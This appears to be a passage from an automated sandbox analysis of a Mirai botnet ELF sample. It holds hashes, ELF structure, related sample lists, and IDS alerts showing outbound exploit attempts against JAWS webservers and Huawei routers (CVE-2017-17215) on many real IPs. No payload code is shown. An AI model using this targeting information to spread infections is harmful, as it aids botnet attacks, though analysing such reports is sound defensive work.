                  36992ETISALAT-MISREGfalse
                  96.80.107.41
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  25.131.247.159
                  unknownUnited Kingdom
                  7922COMCAST-7922USfalse
                  156.189.23.123
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  19.4.56.27
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  130.199.219.112
                  unknownUnited States
                  43BNL-ASUSfalse
                  57.21.242.209
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  155.36.189.95
                  unknownUnited States
                  24324KORDIA-TRANSIT-AS-APKordiaLimitedNZfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  96.107.74.61Msc4ZGQYnn.elfGet hashmaliciousMiraiBrowse
                    156.158.98.17CMmTS10WAb.elfGet hashmaliciousMiraiBrowse
                      1N552URi0wGet hashmaliciousMiraiBrowse
                        156.13.131.6KRHwO20x43.elfGet hashmaliciousGafgyt, MiraiBrowse
                          ak.arm7-20220924-1810.elfGet hashmaliciousMiraiBrowse
                            144.79.65.48ZqzR4J6BPpGet hashmaliciousMiraiBrowse
                              156.124.100.128mpsl.elfGet hashmaliciousMiraiBrowse
                                x86.elfGet hashmaliciousMiraiBrowse
                                  pP489WsUhS.elfGet hashmaliciousMiraiBrowse
                                    YYDFQT2y6l.elfGet hashmaliciousMiraiBrowse
                                      chi.x86.elfGet hashmaliciousMiraiBrowse
                                        197.195.235.255tb8H6vTF5t.elfGet hashmaliciousMirai, MoobotBrowse
                                          CZ20sNTjueGet hashmaliciousMiraiBrowse
                                            156.241.59.243mPS6MjiRe.elfGet hashmaliciousMiraiBrowse
                                              4DeEvAENct.elfGet hashmaliciousMirai, MoobotBrowse
                                                6KAYQOZCoQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  MviPEORLUw.elfGet hashmaliciousUnknownBrowse
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    airtel-tz-asTZx86_64.elfGet hashmaliciousMiraiBrowse
                                                    • 197.187.29.146
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.98.11
                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 156.156.109.186
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.50.48
                                                    nsharm7.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.50.22
                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 156.157.55.83
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.50.21
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.25.66
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.25.65
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 156.158.248.172
                                                    SSHENETUSmpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 166.66.50.54
                                                    xd.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 147.68.63.151
                                                    xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.143.41
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.155.33
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.155.26
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.155.32
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.155.47
                                                    la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                    • 157.162.143.39
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 156.13.155.14
                                                    la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 166.66.37.43
                                                    COMCAST-7922USx86_64.elfGet hashmaliciousMiraiBrowse
                                                    • 71.61.125.147
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 73.245.130.94
                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 76.118.22.201
                                                    teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                    • 174.181.100.238
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 76.129.159.50
                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                    • 96.93.219.47
                                                    teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                    • 76.113.232.18
                                                    teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                    • 76.136.2.23
                                                    xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 96.194.11.133
                                                    xd.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 73.228.172.228
                                                    No context
                                                    No context
                                                    No created / dropped files found
                                                    File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):6.467834635999765
                                                    TrID:
                                                    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                    File name:x86.elf
                                                    File size:63'568 bytes
                                                    MD5:6270c32abec4811eac225d85d0970fac
                                                    SHA1:7fd15114c7ecdd3a0322263794846196c2e40e5d
                                                    SHA256:b107d6730941c0090b2c61cf0a1ecdbd8d7f58d941c46c6d28120a7c14e6e16c
                                                    SHA512:486b03ea0cf6c34dba26fdaeb2e6699779901bbcdeef8df51e80968ae0d40bf1562a84e315c7b2c783b740ffee47f9adb142c22d510a27fc736dcb9699b9879c
                                                    SSDEEP:1536:CuQtv+dR0I0GJ7m6Ba6kt9S6G3jO/Yh+NIuN3:CuQv+dRI+Sga3DpGCQCI
                                                    TLSH:90534BC5A943DDF5EC011A743177BF318B76E53F112ADA86E3AC9A73AD43602A00729C
                                                    File Content Preview:.ELF....................d...4...........4. ...(..................... ... ...............$...$...$...\...<...........Q.td............................U..S............h........[]...$.............U......=.....t..5....d......d.......u........t....h u..........

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:Intel 80386
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x8048164
                                                    Flags:0x0
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:63168
                                                    Section Header Size:40
                                                    Number of Section Headers:10
                                                    Header String Table Index:9
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                    .textPROGBITS0x80480b00xb00xde160x00x6AX0016
                                                    .finiPROGBITS0x8055ec60xdec60x170x00x6AX001
                                                    .rodataPROGBITS0x8055ee00xdee00x16400x00x2A0032
                                                    .ctorsPROGBITS0x80585240xf5240x80x00x3WA004
                                                    .dtorsPROGBITS0x805852c0xf52c0x80x00x3WA004
                                                    .dataPROGBITS0x80585600xf5600x1200x00x3WA0032
                                                    .bssNOBITS0x80586800xf6800x7e00x00x3WA0032
                                                    .shstrtabSTRTAB0x00xf6800x3e0x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x80480000x80480000xf5200xf5206.48780x5R E0x1000.init .text .fini .rodata
                                                    LOAD0xf5240x80585240x80585240x15c0x93c4.32550x6RW 0x1000.ctors .dtors .data .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-03T23:02:00.526356+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350942149.51.174.9080TCP
                                                    2024-12-03T23:02:00.526356+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350942149.51.174.9080TCP
                                                    2024-12-03T23:02:03.885751+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233386672.27.41.15580TCP
                                                    2024-12-03T23:02:03.885751+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233386672.27.41.15580TCP
                                                    2024-12-03T23:02:08.576439+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235961878.83.13.7080TCP
                                                    2024-12-03T23:02:08.576439+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235961878.83.13.7080TCP
                                                    2024-12-03T23:02:11.878430+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23571921.57.198.1680TCP
                                                    2024-12-03T23:02:11.878430+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23571921.57.198.1680TCP
                                                    2024-12-03T23:02:11.909341+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349548144.233.250.21880TCP
                                                    2024-12-03T23:02:11.909341+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349548144.233.250.21880TCP
                                                    2024-12-03T23:02:11.962917+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335186135.15.7.16380TCP
                                                    2024-12-03T23:02:11.962917+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335186135.15.7.16380TCP
                                                    2024-12-03T23:02:12.761427+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355322151.59.53.20780TCP
                                                    2024-12-03T23:02:12.761427+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355322151.59.53.20780TCP
                                                    2024-12-03T23:02:12.822012+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341578184.47.95.23880TCP
                                                    2024-12-03T23:02:12.822012+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341578184.47.95.23880TCP
                                                    2024-12-03T23:02:12.837635+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235701275.244.175.4080TCP
                                                    2024-12-03T23:02:12.837635+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235701275.244.175.4080TCP
                                                    2024-12-03T23:02:12.838140+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333014124.90.254.680TCP
                                                    2024-12-03T23:02:12.838140+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333014124.90.254.680TCP
                                                    2024-12-03T23:02:12.838142+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234823892.205.42.24980TCP
                                                    2024-12-03T23:02:12.838142+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234823892.205.42.24980TCP
                                                    2024-12-03T23:02:12.853137+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340858184.220.227.7780TCP
                                                    2024-12-03T23:02:12.853137+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340858184.220.227.7780TCP
                                                    2024-12-03T23:02:12.853681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233326460.164.109.20380TCP
                                                    2024-12-03T23:02:12.853681+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233326460.164.109.20380TCP
                                                    2024-12-03T23:02:12.877983+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354432158.67.27.13180TCP
                                                    2024-12-03T23:02:12.877983+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354432158.67.27.13180TCP
                                                    2024-12-03T23:02:12.884309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344122124.180.100.20880TCP
                                                    2024-12-03T23:02:12.884309+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344122124.180.100.20880TCP
                                                    2024-12-03T23:02:12.899948+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344190112.16.175.4180TCP
                                                    2024-12-03T23:02:12.899948+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344190112.16.175.4180TCP
                                                    2024-12-03T23:02:12.909349+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357712212.110.217.7580TCP
                                                    2024-12-03T23:02:12.909349+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357712212.110.217.7580TCP
                                                    2024-12-03T23:02:12.909383+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356846203.53.63.11580TCP
                                                    2024-12-03T23:02:12.909383+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356846203.53.63.11580TCP
                                                    2024-12-03T23:02:12.909667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234659279.149.81.19780TCP
                                                    2024-12-03T23:02:12.909667+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234659279.149.81.19780TCP
                                                    2024-12-03T23:02:12.909761+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337830165.207.12.11780TCP
                                                    2024-12-03T23:02:12.909761+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337830165.207.12.11780TCP
                                                    2024-12-03T23:02:13.931392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235915682.120.56.1080TCP
                                                    2024-12-03T23:02:13.931392+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235915682.120.56.1080TCP
                                                    2024-12-03T23:02:13.946792+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336418208.239.12.18980TCP
                                                    2024-12-03T23:02:13.946792+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336418208.239.12.18980TCP
                                                    2024-12-03T23:02:13.946881+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343232164.63.62.18080TCP
                                                    2024-12-03T23:02:13.946881+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343232164.63.62.18080TCP
                                                    2024-12-03T23:02:13.978247+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359542205.244.238.9280TCP
                                                    2024-12-03T23:02:13.978247+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359542205.244.238.9280TCP
                                                    2024-12-03T23:02:13.978276+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235193264.182.50.2880TCP
                                                    2024-12-03T23:02:13.978276+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235193264.182.50.2880TCP
                                                    2024-12-03T23:02:13.987428+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345350143.150.243.10180TCP
                                                    2024-12-03T23:02:13.987428+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345350143.150.243.10180TCP
                                                    2024-12-03T23:02:13.987706+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234281673.36.157.5380TCP
                                                    2024-12-03T23:02:13.987706+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234281673.36.157.5380TCP
                                                    2024-12-03T23:02:13.987842+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360278123.52.192.12380TCP
                                                    2024-12-03T23:02:13.987842+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360278123.52.192.12380TCP
                                                    2024-12-03T23:02:13.988011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342460146.63.138.24680TCP
                                                    2024-12-03T23:02:13.988011+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342460146.63.138.24680TCP
                                                    2024-12-03T23:02:13.988187+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359862111.235.227.10380TCP
                                                    2024-12-03T23:02:13.988187+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359862111.235.227.10380TCP
                                                    2024-12-03T23:02:13.988288+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233585481.114.132.6480TCP
                                                    2024-12-03T23:02:13.988288+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233585481.114.132.6480TCP
                                                    2024-12-03T23:02:14.003444+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359076177.233.205.20180TCP
                                                    2024-12-03T23:02:14.003444+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359076177.233.205.20180TCP
                                                    2024-12-03T23:02:14.039874+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337200198.53.211.16780TCP
                                                    2024-12-03T23:02:14.039874+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337200198.53.211.16780TCP
                                                    2024-12-03T23:02:14.040079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233943868.184.62.24980TCP
                                                    2024-12-03T23:02:14.040079+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233943868.184.62.24980TCP
                                                    2024-12-03T23:02:14.040205+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235368850.151.21.880TCP
                                                    2024-12-03T23:02:14.040205+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235368850.151.21.880TCP
                                                    2024-12-03T23:02:14.696795+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357020156.61.209.11437215TCP
                                                    2024-12-03T23:02:14.697128+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357306156.110.162.23937215TCP
                                                    2024-12-03T23:02:14.697188+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346368197.41.187.19737215TCP
                                                    2024-12-03T23:02:14.697219+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345100156.28.189.14737215TCP
                                                    2024-12-03T23:02:14.697303+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234137441.186.242.23137215TCP
                                                    2024-12-03T23:02:14.712659+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234396241.128.193.6937215TCP
                                                    2024-12-03T23:02:14.712659+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235970041.9.223.14837215TCP
                                                    2024-12-03T23:02:14.712664+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341410156.67.96.7037215TCP
                                                    2024-12-03T23:02:14.712928+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352456197.123.236.3237215TCP
                                                    2024-12-03T23:02:14.713054+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349108156.75.54.18637215TCP
                                                    2024-12-03T23:02:14.721752+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342846156.158.172.24337215TCP
                                                    2024-12-03T23:02:14.721862+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234127241.56.205.3437215TCP
                                                    2024-12-03T23:02:14.728162+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344818197.179.146.19837215TCP
                                                    2024-12-03T23:02:14.728291+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235211441.185.84.3237215TCP
                                                    2024-12-03T23:02:14.728422+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347630156.44.235.1637215TCP
                                                    2024-12-03T23:02:14.728692+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349474156.114.247.12837215TCP
                                                    2024-12-03T23:02:14.737328+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352016197.195.206.13637215TCP
                                                    2024-12-03T23:02:14.737412+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358514197.112.141.25037215TCP
                                                    2024-12-03T23:02:14.737537+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350588156.23.144.8137215TCP
                                                    2024-12-03T23:02:14.737616+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348106197.158.151.6837215TCP
                                                    2024-12-03T23:02:14.743721+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234266841.51.237.6337215TCP
                                                    2024-12-03T23:02:14.743837+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337384197.59.205.7237215TCP
                                                    2024-12-03T23:02:14.743911+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360860197.201.203.20037215TCP
                                                    2024-12-03T23:02:14.744012+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343964197.3.154.23537215TCP
                                                    2024-12-03T23:02:14.744145+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348344197.123.157.2437215TCP
                                                    2024-12-03T23:02:14.744259+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348890197.213.139.4537215TCP
                                                    2024-12-03T23:02:14.744364+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345800156.146.0.17337215TCP
                                                    2024-12-03T23:02:14.744591+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335196156.30.14.11037215TCP
                                                    2024-12-03T23:02:14.752999+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334620197.69.230.16937215TCP
                                                    2024-12-03T23:02:14.753114+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343268156.134.142.21637215TCP
                                                    2024-12-03T23:02:14.753312+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234834041.182.228.10637215TCP
                                                    2024-12-03T23:02:14.759285+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355288197.79.233.8037215TCP
                                                    2024-12-03T23:02:14.759396+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345280156.76.37.5637215TCP
                                                    2024-12-03T23:02:14.759491+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353726197.167.188.18437215TCP
                                                    2024-12-03T23:02:14.759612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359634156.205.236.937215TCP
                                                    2024-12-03T23:02:14.768666+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338152156.64.119.22737215TCP
                                                    2024-12-03T23:02:14.768846+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234594441.89.254.9637215TCP
                                                    2024-12-03T23:02:14.768958+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235442841.153.210.037215TCP
                                                    2024-12-03T23:02:14.769167+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338648197.235.235.15437215TCP
                                                    2024-12-03T23:02:14.769285+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234646441.155.219.17837215TCP
                                                    2024-12-03T23:02:14.769344+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356880197.163.246.24337215TCP
                                                    2024-12-03T23:02:14.769450+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340346197.169.178.5537215TCP
                                                    2024-12-03T23:02:14.769544+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349302197.161.10.6537215TCP
                                                    2024-12-03T23:02:14.769609+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349966156.180.14.8637215TCP
                                                    2024-12-03T23:02:14.769726+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233876241.8.68.18037215TCP
                                                    2024-12-03T23:02:14.769784+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342426156.92.88.23037215TCP
                                                    2024-12-03T23:02:14.786263+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235094641.237.37.21637215TCP
                                                    2024-12-03T23:02:14.786399+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340266156.155.195.25337215TCP
                                                    2024-12-03T23:02:14.786501+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234725441.29.72.1637215TCP
                                                    2024-12-03T23:02:14.786642+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233959841.164.73.8537215TCP
                                                    2024-12-03T23:02:14.786783+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236007241.102.141.1637215TCP
                                                    2024-12-03T23:02:14.786901+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233496641.38.16.10337215TCP
                                                    2024-12-03T23:02:14.787027+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234308041.235.143.15637215TCP
                                                    2024-12-03T23:02:14.787141+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337894197.57.152.22737215TCP
                                                    2024-12-03T23:02:14.787282+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335620156.29.58.5537215TCP
                                                    2024-12-03T23:02:14.787399+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351570156.31.133.22237215TCP
                                                    2024-12-03T23:02:14.787568+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233849641.29.43.12337215TCP
                                                    2024-12-03T23:02:14.791740+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339612197.17.133.4937215TCP
                                                    2024-12-03T23:02:14.792085+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234062641.42.112.9037215TCP
                                                    2024-12-03T23:02:14.792335+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354440197.25.2.2837215TCP
                                                    2024-12-03T23:02:14.792612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353770197.95.113.21137215TCP
                                                    2024-12-03T23:02:14.792807+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339254197.122.183.13037215TCP
                                                    2024-12-03T23:02:14.793140+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335976197.220.67.11237215TCP
                                                    2024-12-03T23:02:16.559536+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357354156.96.122.22437215TCP
                                                    2024-12-03T23:02:16.697217+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336916197.198.188.2037215TCP
                                                    2024-12-03T23:02:16.909303+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343294156.208.58.15237215TCP
                                                    2024-12-03T23:02:16.915546+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345290156.85.239.22237215TCP
                                                    2024-12-03T23:02:16.915736+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342998184.145.222.8880TCP
                                                    2024-12-03T23:02:16.915736+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342998184.145.222.8880TCP
